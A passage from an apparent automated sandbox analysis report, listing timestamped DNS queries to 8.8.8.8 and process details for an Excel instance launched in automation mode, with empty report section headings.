                                                                                                                                                        May 12, 2021 19:48:44.322607040 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:45.092725992 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:45.145890951 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:47.597563028 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:47.656941891 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:48:58.283649921 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:48:58.347536087 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:49:02.030500889 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:49:02.079843044 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:49:30.416145086 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:49:30.488754034 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:49:34.442699909 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:49:34.501931906 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:49:56.446481943 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:49:56.520402908 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:50:06.916539907 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:50:06.989860058 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                        May 12, 2021 19:50:09.013413906 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                        May 12, 2021 19:50:09.070780039 CEST53606338.8.8.8192.168.2.3

                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        CPU Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Memory Usage

                                                                                                                                                        Click to jump to process

                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:19:49:11
                                                                                                                                                        Start date:12/05/2021
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                        Imagebase:0x9d0000
                                                                                                                                                        File size:27110184 bytes
                                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Reset < >